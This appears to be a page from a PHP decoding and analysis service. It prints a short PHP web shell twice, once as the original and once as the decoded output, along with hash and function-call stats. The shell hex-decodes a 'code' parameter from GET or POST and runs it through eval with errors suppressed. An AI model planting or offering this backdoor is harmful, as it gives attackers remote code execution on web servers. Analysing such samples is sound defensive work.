Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @error_reporting(0);@set_time_limit(0);function hexToStr($hex){$string='';for ($i=0;..
Decoded Output download
<?php @error_reporting(0);@set_time_limit(0);function hexToStr($hex){$string='';for ($i=0; $i < strlen($hex)-1; $i+=2){$string .= chr(hexdec($hex[$i].$hex[$i+1]));}return $string;}if(!empty($_GET['code'])){$code=hexToStr($_GET['code']);@eval($code);exit;}if(!empty($_POST['code'])){$code=hexToStr($_POST['code']);@eval($code);exit;}?>
Did this file decode correctly?
Original Code
<?php @error_reporting(0);@set_time_limit(0);function hexToStr($hex){$string='';for ($i=0; $i < strlen($hex)-1; $i+=2){$string .= chr(hexdec($hex[$i].$hex[$i+1]));}return $string;}if(!empty($_GET['code'])){$code=hexToStr($_GET['code']);@eval($code);exit;}if(!empty($_POST['code'])){$code=hexToStr($_POST['code']);@eval($code);exit;}?>
Function Calls
| set_time_limit | 1 |
| error_reporting | 1 |
Stats
| MD5 | 3c56ccc8395b1ed6a18e2cc161ce43a2 |
| Eval Count | 0 |
| Decode Time | 117 ms |